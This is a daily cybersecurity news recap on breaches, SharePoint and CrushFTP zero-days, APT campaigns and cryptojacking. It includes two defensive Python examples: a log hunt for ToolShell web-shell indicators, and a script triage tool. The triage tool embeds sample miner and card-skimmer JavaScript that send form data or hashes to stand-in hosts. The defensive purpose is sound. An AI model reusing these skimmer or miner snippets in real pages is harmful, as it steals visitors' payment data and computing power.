Cybersecurity News | Daily Recap [21 Jul 2025]

Today's recap covers data breaches affecting millions of people, including those at Radiology Associates and Dior, and zero-day vulnerabilities under active exploitation in Microsoft SharePoint and CrushFTP. It also covers APT activity from MuddyWater, the Russian GRU and China-aligned actors, and cybercrime techniques including cryptojacking, FIDO cross-device phishing and SS7-based location tracking.

Data Breaches & Ransomware

  • Radiology Associates data breach exposed info of over 1.4 million people, with credit monitoring offered – Radiology Breach
  • BianLian ransomware led to data breach at Alcohol & Drug Testing Service impacting 750,000 individuals – TADTS Breach
  • Over 200,000 affected by healthcare-related data breaches at Cierant and Zumpano Patricios involving software vulnerabilities – Law Firm Breaches
  • Luxury brands Dior and Louis Vuitton victims of data breach linked to ShinyHunters, with customer notifications underway – Dior Breach
  • Dell confirms breach of test lab platform by the extortion group World Leaks targeting synthetic demo data – Dell Breach

Zero-Day Vulnerabilities

  • On-premises Microsoft SharePoint servers are under active attack through the zero-day flaws CVE-2025-53770 and CVE-2025-53771, chained in the “ToolShell” attacks for remote code execution; Microsoft has released emergency patches – SharePoint Patches, SharePoint Zero-Day
  • CrushFTP servers suffer exploitation of a critical zero-day vulnerability (CVE-2025-54309) granting admin access to over 1,000 exposed instances – CrushFTP Exposure, CrushFTP Zero-Day
  • HPE Instant On devices patched for critical hard-coded credentials and command injection vulnerabilities allowing remote admin access – HPE Vulnerabilities
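For defenders who cannot patch immediately, the first question is whether the server was already hit. The script below is an added example (not code from the recap or from Microsoft) that hunts IIS W3C logs for the publicly reported ToolShell request pattern: a POST to /_layouts/15/ToolPane.aspx with DisplayMode=Edit whose Referer is /_layouts/SignOut.aspx, followed by requests for the spinstall0.aspx web shell. It assumes the IIS default W3C field layout; the log lines are constructed.

```python
"""Hunt IIS W3C logs for the ToolShell request pattern against SharePoint.

Added example, not code from the recap or from Microsoft. Assumptions:
the IIS default W3C field layout (IIS writes spaces inside field values
as '+', so whitespace splitting is safe), and the publicly reported
ToolShell indicators: a POST to /_layouts/15/ToolPane.aspx with
DisplayMode=Edit whose Referer is /_layouts/SignOut.aspx, and any request
for the spinstall0.aspx web shell. The log lines below are constructed.
"""
from dataclasses import dataclass

# Constructed sample: two benign requests and one intrusion sequence.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status
2025-07-19 08:01:02 10.0.0.5 GET /sites/hr/default.aspx - 443 CORP\\alice 10.0.1.20 Mozilla/5.0+(Windows) https://sp.corp.example/ 200
2025-07-19 08:02:13 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit&a=/ToolPane.aspx 443 - 203.0.113.7 Mozilla/5.0 /_layouts/SignOut.aspx 200
2025-07-19 08:02:15 10.0.0.5 GET /_layouts/15/spinstall0.aspx - 443 - 203.0.113.7 Mozilla/5.0 - 200
2025-07-19 08:05:00 10.0.0.5 GET /_layouts/15/ToolPane.aspx DisplayMode=Edit 443 CORP\\bob 10.0.1.21 Mozilla/5.0 https://sp.corp.example/sites/hr 200
"""


@dataclass
class Hit:
    line_no: int
    client_ip: str
    reason: str


def parse_iis(text):
    """Yield (line_no, record) for each data line, using the #Fields header."""
    fields = None
    for n, line in enumerate(text.splitlines(), 1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed or truncated line; skip rather than misalign fields
        yield n, dict(zip(fields, parts))


def hunt_toolshell(text):
    """Return Hit records for lines matching the ToolShell indicators."""
    hits = []
    for n, rec in parse_iis(text):
        stem = rec["cs-uri-stem"].lower()
        query = rec["cs-uri-query"].lower()
        referer = rec["cs(Referer)"].lower()
        if stem.endswith("/spinstall0.aspx"):
            hits.append(Hit(n, rec["c-ip"], "request for spinstall0.aspx web shell"))
        elif (rec["cs-method"] == "POST"
              and stem.endswith("/toolpane.aspx")
              and "displaymode=edit" in query
              and referer.endswith("/_layouts/signout.aspx")):
            # A normal editor opens ToolPane.aspx from a site page, not from SignOut.aspx.
            hits.append(Hit(n, rec["c-ip"], "POST to ToolPane.aspx with SignOut.aspx referer"))
    return hits


def suspect_ips(hits):
    """Distinct client IPs behind the hits, for blocking and pivoting."""
    return sorted({h.client_ip for h in hits})


if __name__ == "__main__":
    found = hunt_toolshell(SAMPLE_LOG)
    for h in found:
        print(f"line {h.line_no}: {h.client_ip} {h.reason}")
    print("suspect source IPs:", suspect_ips(found))
```

The authenticated GET to ToolPane.aspx on the last sample line is deliberately not flagged: legitimate page editing hits the same endpoint, and the distinguishing features are the POST method together with the SignOut.aspx referer. A hit should trigger key rotation of the farm's MachineKey as well as patching, since the web shell's purpose is to steal those keys.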

APT & Espionage Campaigns

  • Iranian APT MuddyWater deploys new Android variants of DCHSpy spyware targeting Middle East users with political lures amid Israel-Iran tensions – MuddyWater DCHSpy
  • Russia's GRU deploys the “Authentic Antics” malware against Microsoft cloud email accounts, as the UK sanctions GRU units and officers – Authentic Antics
  • China-aligned APTs intensify cyber espionage attacks on Taiwan’s semiconductor industry through spearphishing and malware deployment – Taiwan Semiconductor Espionage
  • South Asian APT group UNG0002 runs multi-stage cyber espionage campaigns targeting gaming, academia, and software sectors across Asia – UNG0002 Campaign
  • EncryptHub targets Web3 developers using fake AI platforms to deploy info-stealing Fickle Stealer malware against crypto projects – EncryptHub Attack

Cybercrime & Attack Techniques

  • Attackers hijacked over 3,500 websites using stealth JavaScript miners and WebSocket tactics for cryptojacking and Magecart credit card skimming – Crypto Mining Campaign
  • The PoisonSeed phishing campaign abuses FIDO cross-device sign-in: the phishing site relays the victim's credentials to the real login, triggers the cross-device flow, and shows the victim the resulting QR code, so the victim's own security key approves the attacker's session – PoisonSeed Attack
  • Surveillance firm bypasses SS7 protections by manipulating TCAP messages to covertly track user locations, exposing mobile network vulnerabilities – SS7 Tracking
  • CoinDCX suffers a cyberattack causing a $44 million loss, but confirms no user wallets were impacted – CoinDCX Attack
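The website-hijacking item above combines two payload types, in-browser miners and card skimmers, that share delivery (injected JavaScript) but differ in behaviour. The following is an added example, not code from the recap or from any vendor, of the kind of heuristic triage a defender can run over scripts pulled from a site: WebAssembly plus CPU-bound workers or a WebSocket to an off-origin host points at mining, while form-field harvesting paired with an outbound channel points at skimming. The page host and the three script samples are constructed, and the traits are a starting point rather than a signature set for the reported campaign.

```python
"""Heuristic triage of page scripts for cryptojacking and Magecart traits.

Added example, not code from the recap or from any vendor. The traits
(WebAssembly plus CPU-bound workers, a WebSocket to a host other than the
page's own, form-field harvesting paired with an outbound channel) are a
practitioner's starting point, not a signature set for the reported
campaign. The page host and the three script samples are constructed.
"""
import re
from urllib.parse import urlparse

PAGE_HOST = "www.shop.example"

# Constructed samples: one legitimate first-party script, one miner, one skimmer.
SAMPLE_SCRIPTS = {
    "analytics": """
        document.addEventListener('click', function () {
          fetch('/api/track', {method: 'POST', body: JSON.stringify({p: location.pathname})});
        });
    """,
    "miner": """
        var n = navigator.hardwareConcurrency || 2;
        var ws = new WebSocket('wss://pool.miner-relay.example/ws');
        for (var i = 0; i < n; i++) { new Worker('/static/w.js'); }
        WebAssembly.instantiate(buf).then(function (m) { ws.send(m.instance.exports.hash()); });
    """,
    "skimmer": """
        document.addEventListener('submit', function () {
          var d = {};
          document.querySelectorAll('input').forEach(function (i) { d[i.name] = i.value; });
          new Image().src = 'https://cdn.static-assets.example/p.gif?q=' + btoa(JSON.stringify(d));
        });
    """,
}

URL_RE = re.compile(r"""(?:https?|wss?)://[^\s'"()]+""")


def foreign_endpoints(script, page_host):
    """Split absolute URLs in the script into off-origin WebSocket and HTTP hosts."""
    ws, http = set(), set()
    for url in URL_RE.findall(script):
        u = urlparse(url)
        if u.hostname and u.hostname != page_host:
            (ws if u.scheme in ("ws", "wss") else http).add(u.hostname)
    return ws, http


def triage_script(script, page_host):
    """Collect behavioural traits and map them to a verdict."""
    ws, http = foreign_endpoints(script, page_host)
    traits = []
    if ws:
        traits.append("websocket_to_foreign_host")
    if re.search(r"WebAssembly\.(instantiate|instantiateStreaming|compile)\b", script):
        traits.append("wasm")
    if re.search(r"new\s+Worker\s*\(", script) and "hardwareConcurrency" in script:
        traits.append("cpu_bound_workers")  # one worker per core is the miner signature
    if (re.search(r"querySelectorAll\s*\(\s*['\"]input", script)
            or re.search(r"addEventListener\s*\(\s*['\"](submit|keyup|input)['\"]", script)):
        traits.append("form_harvest")
    if http and re.search(r"\b(fetch|XMLHttpRequest|sendBeacon|new\s+Image)\b", script):
        traits.append("exfil_channel")  # an image beacon is the classic skimmer exfil path
    if re.search(r"\b(atob|btoa|String\.fromCharCode|unescape)\s*\(", script):
        traits.append("encoding")

    verdict = "benign"
    if "wasm" in traits and ("cpu_bound_workers" in traits or "websocket_to_foreign_host" in traits):
        verdict = "cryptominer"
    elif "form_harvest" in traits and "exfil_channel" in traits:
        verdict = "skimmer"
    return {"verdict": verdict, "traits": traits, "foreign_hosts": sorted(ws | http)}


def triage_page(scripts, page_host):
    """Triage every script on a page; returns name -> result."""
    return {name: triage_script(src, page_host) for name, src in scripts.items()}


if __name__ == "__main__":
    for name, result in triage_page(SAMPLE_SCRIPTS, PAGE_HOST).items():
        print(f"{name}: {result['verdict']} {result['traits']} {result['foreign_hosts']}")
```

The first-party analytics script uses a relative URL and a click handler, so it collects no traits; that negative case matters, because any real site has plenty of scripts that talk to the network and read form fields on their own. The off-origin hosts returned for a flagged script are the natural next pivot for blocking and for checking whether other sites in the same estate load from them.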

Cybersecurity Strategies & Tools

  • By 2026, over 80% of organizations aim to adopt Zero Trust security models, leveraging AI for adaptive access and threat detection – AI in Zero Trust
  • Japan’s National Police Agency releases free decryption tools for victims of Phobos and 8Base ransomware through international collaboration – Ransomware Decryption Tool

Investigations & Incident Responses

  • Poland investigates potential sabotage following temporary air traffic control outage amid concerns of Russian destabilization efforts – Poland ATC Investigation
  • Recent ransomware and malware threats including KAWA4096, CrazyHunter, and multiple global RaaS platforms demonstrate rising geopolitical cyber tensions – Weekly Threat Recap

Cybersecurity News | Daily Recap – hendryadrian.com